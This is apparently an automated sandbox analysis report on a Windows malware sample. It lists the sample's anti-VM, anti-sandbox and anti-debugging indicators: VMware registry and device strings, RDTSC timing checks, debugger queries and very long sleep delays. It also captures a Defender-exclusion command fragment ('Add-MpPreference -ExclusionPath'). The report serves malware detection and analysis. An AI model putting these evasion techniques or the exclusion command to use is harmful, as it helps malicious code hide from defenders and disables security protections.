Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 457b22da_by_Libranalysis.exe PID: 4120, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000008F85E4 second address: 00000000008F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000008F897E second address: 00000000008F8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe

Code function: 4_2_004088B0 rdtsc

4_2_004088B0

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe TID: 5504	Thread sleep time: -104854s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe TID: 5808	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe TID: 808	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6460	Thread sleep time: -50000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Thread delayed: delay time: 104854	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 00000005.00000000.257996526.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.257996526.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000005.00000000.263927638.000000000F596000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.256121125.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.257172140.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000005.00000002.493965122.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000005.00000000.257996526.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000005.00000000.257996526.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000005.00000000.258585279.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000005.00000000.251488161.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.256121125.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.256121125.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000005.00000000.256121125.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Show sources

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe

Code function: 0_2_00C91660 CheckRemoteDebuggerPresent,

0_2_00C91660

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe

Code function: 4_2_004088B0 rdtsc

4_2_004088B0

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe

Code function: 4_2_00409B20 LdrLoadDll,

4_2_00409B20

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01942990 mov eax, dword ptr fs:[00000030h]	4_2_01942990
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194FD9B mov eax, dword ptr fs:[00000030h]	4_2_0194FD9B
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194FD9B mov eax, dword ptr fs:[00000030h]	4_2_0194FD9B
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194A185 mov eax, dword ptr fs:[00000030h]	4_2_0194A185
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0193C182 mov eax, dword ptr fs:[00000030h]	4_2_0193C182
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01942581 mov eax, dword ptr fs:[00000030h]	4_2_01942581
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01942581 mov eax, dword ptr fs:[00000030h]	4_2_01942581
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01942581 mov eax, dword ptr fs:[00000030h]	4_2_01942581
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01942581 mov eax, dword ptr fs:[00000030h]	4_2_01942581
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01912D8A mov eax, dword ptr fs:[00000030h]	4_2_01912D8A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01912D8A mov eax, dword ptr fs:[00000030h]	4_2_01912D8A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01912D8A mov eax, dword ptr fs:[00000030h]	4_2_01912D8A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01912D8A mov eax, dword ptr fs:[00000030h]	4_2_01912D8A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01912D8A mov eax, dword ptr fs:[00000030h]	4_2_01912D8A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01941DB5 mov eax, dword ptr fs:[00000030h]	4_2_01941DB5
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01941DB5 mov eax, dword ptr fs:[00000030h]	4_2_01941DB5
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01941DB5 mov eax, dword ptr fs:[00000030h]	4_2_01941DB5
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019951BE mov eax, dword ptr fs:[00000030h]	4_2_019951BE
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019951BE mov eax, dword ptr fs:[00000030h]	4_2_019951BE
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019951BE mov eax, dword ptr fs:[00000030h]	4_2_019951BE
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019951BE mov eax, dword ptr fs:[00000030h]	4_2_019951BE
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019461A0 mov eax, dword ptr fs:[00000030h]	4_2_019461A0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019461A0 mov eax, dword ptr fs:[00000030h]	4_2_019461A0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019435A1 mov eax, dword ptr fs:[00000030h]	4_2_019435A1
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019969A6 mov eax, dword ptr fs:[00000030h]	4_2_019969A6
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019C8DF1 mov eax, dword ptr fs:[00000030h]	4_2_019C8DF1
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191B1E1 mov eax, dword ptr fs:[00000030h]	4_2_0191B1E1
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191B1E1 mov eax, dword ptr fs:[00000030h]	4_2_0191B1E1
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191B1E1 mov eax, dword ptr fs:[00000030h]	4_2_0191B1E1
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019A41E8 mov eax, dword ptr fs:[00000030h]	4_2_019A41E8
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0192D5E0 mov eax, dword ptr fs:[00000030h]	4_2_0192D5E0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0192D5E0 mov eax, dword ptr fs:[00000030h]	4_2_0192D5E0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01919100 mov eax, dword ptr fs:[00000030h]	4_2_01919100
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01919100 mov eax, dword ptr fs:[00000030h]	4_2_01919100
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01919100 mov eax, dword ptr fs:[00000030h]	4_2_01919100
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191AD30 mov eax, dword ptr fs:[00000030h]	4_2_0191AD30
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]	4_2_01923D34
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]	4_2_01923D34
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]	4_2_01923D34
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]	4_2_01923D34
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]	4_2_01923D34
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]	4_2_01923D34
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]	4_2_01923D34
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]	4_2_01923D34
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]	4_2_01923D34
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]	4_2_01923D34
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]	4_2_01923D34
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]	4_2_01923D34
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]	4_2_01923D34
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E8D34 mov eax, dword ptr fs:[00000030h]	4_2_019E8D34
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194513A mov eax, dword ptr fs:[00000030h]	4_2_0194513A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194513A mov eax, dword ptr fs:[00000030h]	4_2_0194513A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0199A537 mov eax, dword ptr fs:[00000030h]	4_2_0199A537
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01944D3B mov eax, dword ptr fs:[00000030h]	4_2_01944D3B
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01944D3B mov eax, dword ptr fs:[00000030h]	4_2_01944D3B
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01944D3B mov eax, dword ptr fs:[00000030h]	4_2_01944D3B
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01934120 mov eax, dword ptr fs:[00000030h]	4_2_01934120
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01934120 mov eax, dword ptr fs:[00000030h]	4_2_01934120
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01934120 mov eax, dword ptr fs:[00000030h]	4_2_01934120
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01934120 mov eax, dword ptr fs:[00000030h]	4_2_01934120
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01934120 mov ecx, dword ptr fs:[00000030h]	4_2_01934120
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01937D50 mov eax, dword ptr fs:[00000030h]	4_2_01937D50
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01953D43 mov eax, dword ptr fs:[00000030h]	4_2_01953D43
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0193B944 mov eax, dword ptr fs:[00000030h]	4_2_0193B944
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0193B944 mov eax, dword ptr fs:[00000030h]	4_2_0193B944
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01993540 mov eax, dword ptr fs:[00000030h]	4_2_01993540
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191B171 mov eax, dword ptr fs:[00000030h]	4_2_0191B171
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191B171 mov eax, dword ptr fs:[00000030h]	4_2_0191B171
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0193C577 mov eax, dword ptr fs:[00000030h]	4_2_0193C577
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0193C577 mov eax, dword ptr fs:[00000030h]	4_2_0193C577
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191C962 mov eax, dword ptr fs:[00000030h]	4_2_0191C962
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0192849B mov eax, dword ptr fs:[00000030h]	4_2_0192849B
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01919080 mov eax, dword ptr fs:[00000030h]	4_2_01919080
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01993884 mov eax, dword ptr fs:[00000030h]	4_2_01993884
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01993884 mov eax, dword ptr fs:[00000030h]	4_2_01993884
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194F0BF mov ecx, dword ptr fs:[00000030h]	4_2_0194F0BF
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194F0BF mov eax, dword ptr fs:[00000030h]	4_2_0194F0BF
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194F0BF mov eax, dword ptr fs:[00000030h]	4_2_0194F0BF
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]	4_2_019420A0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]	4_2_019420A0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]	4_2_019420A0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]	4_2_019420A0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]	4_2_019420A0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]	4_2_019420A0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019590AF mov eax, dword ptr fs:[00000030h]	4_2_019590AF
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E8CD6 mov eax, dword ptr fs:[00000030h]	4_2_019E8CD6
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019AB8D0 mov eax, dword ptr fs:[00000030h]	4_2_019AB8D0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019AB8D0 mov ecx, dword ptr fs:[00000030h]	4_2_019AB8D0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019AB8D0 mov eax, dword ptr fs:[00000030h]	4_2_019AB8D0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019AB8D0 mov eax, dword ptr fs:[00000030h]	4_2_019AB8D0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019AB8D0 mov eax, dword ptr fs:[00000030h]	4_2_019AB8D0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019AB8D0 mov eax, dword ptr fs:[00000030h]	4_2_019AB8D0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D14FB mov eax, dword ptr fs:[00000030h]	4_2_019D14FB
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01996CF0 mov eax, dword ptr fs:[00000030h]	4_2_01996CF0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01996CF0 mov eax, dword ptr fs:[00000030h]	4_2_01996CF0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01996CF0 mov eax, dword ptr fs:[00000030h]	4_2_01996CF0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019158EC mov eax, dword ptr fs:[00000030h]	4_2_019158EC
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E4015 mov eax, dword ptr fs:[00000030h]	4_2_019E4015
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E4015 mov eax, dword ptr fs:[00000030h]	4_2_019E4015
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01997016 mov eax, dword ptr fs:[00000030h]	4_2_01997016
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01997016 mov eax, dword ptr fs:[00000030h]	4_2_01997016
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01997016 mov eax, dword ptr fs:[00000030h]	4_2_01997016
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E740D mov eax, dword ptr fs:[00000030h]	4_2_019E740D
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E740D mov eax, dword ptr fs:[00000030h]	4_2_019E740D
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E740D mov eax, dword ptr fs:[00000030h]	4_2_019E740D
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01996C0A mov eax, dword ptr fs:[00000030h]	4_2_01996C0A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01996C0A mov eax, dword ptr fs:[00000030h]	4_2_01996C0A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01996C0A mov eax, dword ptr fs:[00000030h]	4_2_01996C0A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01996C0A mov eax, dword ptr fs:[00000030h]	4_2_01996C0A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]	4_2_019D1C06
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]	4_2_019D1C06
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]	4_2_019D1C06
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]	4_2_019D1C06
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]	4_2_019D1C06
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]	4_2_019D1C06
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]	4_2_019D1C06
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]	4_2_019D1C06
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]	4_2_019D1C06
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]	4_2_019D1C06
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]	4_2_019D1C06
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]	4_2_019D1C06
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]	4_2_019D1C06
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]	4_2_019D1C06
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0192B02A mov eax, dword ptr fs:[00000030h]	4_2_0192B02A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0192B02A mov eax, dword ptr fs:[00000030h]	4_2_0192B02A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0192B02A mov eax, dword ptr fs:[00000030h]	4_2_0192B02A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0192B02A mov eax, dword ptr fs:[00000030h]	4_2_0192B02A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194BC2C mov eax, dword ptr fs:[00000030h]	4_2_0194BC2C
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194002D mov eax, dword ptr fs:[00000030h]	4_2_0194002D
